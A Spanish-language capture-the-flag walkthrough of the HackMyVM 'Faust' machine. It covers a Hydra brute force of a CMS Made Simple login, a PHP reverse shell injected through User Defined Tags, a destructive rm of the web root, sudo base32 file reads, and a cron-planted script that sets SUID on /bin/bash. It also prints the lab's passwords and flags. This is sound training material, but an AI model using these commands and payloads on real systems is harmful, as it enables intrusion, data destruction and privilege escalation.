Faust HackMyVM (Easy - Linux)
Escaneo de puertos
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn <IP>nmap -sCV -p<PORTS> <IP>Info:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-21 10:17 EDT
Nmap scan report for 192.168.5.55
Host is up (0.0010s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 54:0a:75:c5:26:56:f5:b0:5f:6d:e1:e0:77:15:c7:0d (RSA)
| 256 0b:d7:89:52:2d:13:16:cb:74:96:f5:5f:dd:3e:52:8e (ECDSA)
|_ 256 5a:90:0c:f5:2b:7f:ba:1c:83:02:4d:e7:a2:a2:1d:5b (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-generator: CMS Made Simple - Copyright (C) 2004-2021. All rights reserved.
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Home - cool_cms
6660/tcp open unknown
| fingerprint-strings:
| NULL, Socks5:
| MESSAGE FOR WWW-DATA:
| [31m www-data I offer you a dilemma: if you agree to destroy all your stupid work, then you have a reward in my house...
|_ Paul
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at
https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port6660-TCP:V=7.95%I=7%D=6/21%Time=6856BF1B%P=x86_64-pc-linux-gnu%r(NU
SF:LL,A5,"\n\n\x20\x20\x20MESSAGE\x20FOR\x20WWW-DATA:\n\n\x20\x1b[31m\x20
SF:\x20www-data\x20I\x20offer\x20you\x20a\x20dilemma:\x20if\x20you\x20agre
SF:e\x20to\x20destroy\x20all\x20your\x20stupid\x20work,\x20then\x20you\x20
SF:have\x20a\x20reward\x20in\x20my\x20house\.\.\.\n\x20\x20\x20Paul\x20\x1
SF:b[0m\n")%r(Socks5,A5,"\n\n\x20\x20\x20MESSAGE\x20FOR\x20WWW-DATA:\n\n\
SF:x20\x1b[31m\x20\x20www-data\x20I\x20offer\x20you\x20a\x20dilemma:\x20i
SF:f\x20you\x20agree\x20to\x20destroy\x20all\x20your\x20stupid\x20work,\x2
SF:0then\x20you\x20have\x20a\x20reward\x20in\x20my\x20house\.\.\.\n\x20\x2
SF:0\x20Paul\x20\x1b[0m\n");
MAC Address: 08:00:27:1D:5B:19 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.38 secondsVeremos que hay un puerto 80 y un puerto 6660 en el que pone un mensaje bastante interesante, pero en el puerto 80 se aloja una pagina web, vamos a ver que contiene dicho puerto, si nos metemos veremos una pagina web normal sin ningun tipo de vulnerabilidad aparente, vamos a realizar un poco de fuzzing a ver que encontramos.
Gobuster
gobuster dir -u http://<IP>/ -w <WORDLIST> -x html,php,txt -t 50 -k -rInfo:
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.5.55/
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,php,txt
[+] Follow Redirect: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 277]
/modules (Status: 200) [Size: 3381]
/uploads (Status: 200) [Size: 0]
/doc (Status: 200) [Size: 24]
/index.php (Status: 200) [Size: 19347]
/assets (Status: 200) [Size: 2129]
/admin (Status: 200) [Size: 4479]
/lib (Status: 200) [Size: 24]
/.php (Status: 403) [Size: 277]
/config.php (Status: 200) [Size: 0]
/tmp (Status: 200) [Size: 1131]
Progress: 102337 / 882244 (11.60%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 102701 / 882244 (11.64%)
===============================================================
Finished
===============================================================Veremos una seccion bastante interesante llamada /admin, en el que si entramos veremos un login, pero si probamos credenciales por defecto como por ejemplo admin:admin no nos dejara, por lo que vamos a probar fuerza bruta con el login utilizando el usuario admin a ver si hay suerte.
Escalate user paul
Hydra
hydra -l admin -P <WORDLIST> <IP> http-post-form "/admin/login.php:username=^USER^&password=^PASS^&loginsubmit=Submit:User name or password incorrect"Info:
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-06-21 10:06:39
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://192.168.5.55:80/admin/login.php:username=^USER^&password=^PASS^&loginsubmit=Submit:User name or password incorrect
[80][http-post-form] host: 192.168.5.55 login: admin password: bullshit
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-06-21 10:07:15Veremos que ha sacado de forma correcta las credenciales del admin por lo que nos loguearemos de la siguiente forma:
Username: admin
Password: bullshitUna vez dentro si exploramos un poco el panel veremos la seccion Tags en la cual aparecen varias opciones, pero entre ellas hay un icono de una terminal llamado User Defined Tags por lo que se ve bastante interesante, si entramos dentro vamos a probar a darle al boton llamado Add User Defined Tag.
En el campo Name pondremos por ejemplo Shell y en el campo Code: pondremos lo siguiente:
<?php
$sock=fsockopen("<IP>",<PORT>);$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);
?>Ahora le daremos a Submit y nos pondremos a la escucha de la siguiente forma.
nc -lvnp <PORT>Estando a la escucha le daremos de nuevo a shell en el Tag y seguidamente le daremos a la opcion llamada Run, si volvemos a donde tenemos la escucha veremos lo siguiente:
listening on [any] 7777 ...
connect to [192.168.5.50] from (UNKNOWN) [192.168.5.55] 34626
whoami
www-dataPor lo que vemos ha funcionado, por lo que sanitizaremos la shell.
Sanitización de shell (TTY)
script /dev/null -c bash# <Ctrl> + <z>
stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=/bin/bash
# Para ver las dimensiones de nuestra consola en el Host
stty size
# Para redimensionar la consola ajustando los parametros adecuados
stty rows <ROWS> columns <COLUMNS>Escalate user paul
Antes vimos que en el puerto 6660 pone este mensaje:
MESSAGE FOR WWW-DATA:
[31m www-data I offer you a dilemma: if you agree to destroy all your stupid work, then you have a reward in my house...
PaulVemos que nos esta mencionando que si eliminamos nuestro "trabajo" en este caso el contenido de la carpeta html/ nos dejara algo en la /home del usuario Paul, por lo que vamos hacer lo siguiente:
rm -r /var/www/html/*Al hacer esto veremos que nos aparece un password.txt en la /home de Paul que pone lo siguiente:
Password is: YouCanBecomePaulVamos a probar dichas credenciales a ver si funcionan.
su paulMetemos como contraseña YouCanBecomePaul y veremos que estamos dentro.
Escalate user nico
Si hacemos sudo -l veremos lo siguiente:
Entrées par défaut pour paul sur debian :
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
L'utilisateur paul peut utiliser les commandes suivantes sur debian :
(nico) /usr/bin/base32Veremos que podemos ejecutar Base32 como el usuario nico por lo que podremos realizar lo siguiente:
Vamos a leer la flag del usuario.
user.txt
LFILE=/home/nico/user.txt
sudo -u nico base32 "$LFILE" | base32 --decodeInfo:
gamhanarhuAhora vamos a listar la /home de nico.
total 32
drwxr-xr-x 3 nico nico 4096 avril 1 2021 .
drwxr-xr-x 4 root root 4096 avril 1 2021 ..
lrwxrwxrwx 1 root root 9 avril 1 2021 .bash_history -> /dev/null
-rw-r--r-- 1 nico nico 220 avril 1 2021 .bash_logout
-rw-r--r-- 1 nico nico 3526 avril 1 2021 .bashrc
drwxr-xr-x 3 nico nico 4096 avril 1 2021 .local
-rw-r--r-- 1 nico nico 807 avril 1 2021 .profile
-rwx------ 1 nico nico 37 avril 1 2021 .secret.txt
-rwx------ 1 nico nico 11 avril 1 2021 user.txtVeremos que hay un archivo interesante llamado .secret.txt si lo leemos veremos lo siguiente:
LFILE=/home/nico/.secret.txt
sudo -u nico base32 "$LFILE" | base32 --decodeInfo:
UHcgPT4ganVzdF9vbmVfbW9yZV9iZWVyIA==Vemos que esta codificado en Base64, si lo decodificamos en nuestro host de esta forma.
echo 'UHcgPT4ganVzdF9vbmVfbW9yZV9iZWVyIA==' | base64 -dInfo:
Pw => just_one_more_beerVemos lo que parece ser la contraseña de dicho usuario.
su nicoMetemos como contraseña just_one_more_beer y veremos que estaremos dentro.
Escalate Privileges
En la / (Raiz) veremos una carpeta llamada nico si entramos dentro veremos un archivo de imagen llamado homer.jpg.
total 56
drwx------ 2 nico nico 4096 avril 1 2021 .
drwxr-xr-x 19 root root 4096 avril 1 2021 ..
-rwxrwx--- 1 nico root 47162 avril 1 2021 homer.jpgTiene toda la pinta de que oculta algun archivo o algo por dentro, por lo que vamos a utilizar la herramienta steghide para ver si podemos extraer algun archivo con suerte sin contraseña.
NOTA
El archivo nos lo pasamos mediante un servidor de python3 a nuestra maquina atacante con wget.
steghide extract -sf homer.jpgDejamos la contraseña vacia...
Info:
Enter passphrase:
wrote extracted data to "note.txt".Veremos que ha funcionado, nos ha extraido un archivo llamado note.txt en el que pone lo siguiente:
my /tmp/goodgame file was so good... but I lost itPor lo que podemos entender con esto es que por detras tiene que haber algun crontab programado para ejecutar dicho archivo, si nosotros nos vamos a la carpeta /tmp no veremos el archivo por lo que vamos a probar a crear uno malicioso a ver si se ejecuta como root.
nano /tmp/goodgame
#Dentro del nano
#!/bin/sh
chmod u+s /bin/bashLo guardamos, establecemos los permisos necesarios...
chmod +x /tmp/goodgameY esperamos un rato, despues de esperar vamos a comprobar que haya funcionado listando la bash.
ls -la /bin/bashInfo:
-rwsr-xr-x 1 root root 1168776 avril 18 2019 /bin/bashPor lo que vemos a funcionado, por lo que haremos lo siguiente para ser root.
bash -pInfo:
bash-5.0# whoami
rootCon esto seremos root por lo que leeremos la flag de root.
root.txt
lasarnsilgamLast updated